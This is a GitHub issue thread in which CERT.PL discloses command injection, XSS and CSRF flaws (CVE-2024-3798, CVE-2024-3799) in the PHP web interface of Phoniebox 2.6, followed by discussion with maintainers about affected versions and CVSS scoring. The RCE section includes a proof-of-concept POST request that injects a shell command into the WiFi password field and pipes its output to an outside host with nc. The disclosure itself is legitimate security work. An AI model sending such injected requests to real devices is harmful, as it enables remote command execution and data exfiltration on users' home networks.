RPi-Jukebox-RFID copied to clipboard
🐛 | RCE/CSRF/XSS vulnerabilities
~~3.5.2~~ 2.6
Pi model
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What happened?
CERT.PL has found several vulnerabilities while performing a wider scan of open source projects.
Since our last issue remained open, we've decided to post details here and reserve CVEs to make the discussion easier. We tested the current state of develop
As we focus mainly on finding vulnerabilities, we may not be able to assist you in the process of preparing required fixes and/or validate their quality.
RCE/XSS/CSRF (CVE-2024-3798)
GET parameter file
handled by htdocs/api/playlist/playsinglefile.php
let's you execute commands
Using the same parameter it's possible to exploit XSS vulnerability:;%3C/script%3E
and also CSRF, which results in opening any file an attacker would point to.
RCE (CVE-2024-3799)
Sending a crafted POST request to htdocs/inc.setWifi.php
let's you execute commands.
fetch("", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": "submitWifi=submit&WIFIssid_ls=lll&WIFIpass_ls=12345678';ls|nc web.kazet.cc 3333; #&WIFIprio_ls=1","method": "POST",}).then((response) => {return response.text(); }).then((data) => {console.log(data);})
While this file should not be directly accessible from the internet, one may think of a scenario when a Jukebox user visits a site with an included JS script, which would send such a request to multiple hosts on LAN network
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@lukigruszka thank you.
Currently we don't have any process in integrating vulnerabilities.
How did you find and catch this project in your process?
We just searched for popular projects on GH and performed a relatively shallow check on them. Surely the scan was not intended to find all possible vulnerabilities, so other ones might exist in this project.
@lukigruszka the version of Phoniebox is not correct, it's 2.6
Thanks @s-martin for correcting the version, I must admit getting a bit confused by the branching strategy ;-)
Hello, since details were already disclosed and nobody proved that these vulnerabilities do not exist, we have decided to publish the records. They are available under the links: CVE-2024-3798 CVE-2024-3799
@CERT-PL-CNA thanks for the info.
You may want to clarify the description of both entries a little.
Newer versions of 3.x branches are not affected as the version 3 is a complete rewrite which uses a completely new code base (and no PHP at all).
Personally I also don't think the severity is "high" as the Phoniebox web interface is usually only accessed from a local network.
Hi @s-martin. you are right about the versions, we have adjusted the entries.
Regarding the CVSS score - as the attack might be performed remotely by serving a malicious website, we opt to leave the factors unchanged. But even if we changed the vector from Remote
to Local
, then we would also have to switch the required User Interaction
to None
and the overall score would decrease by only 0.1.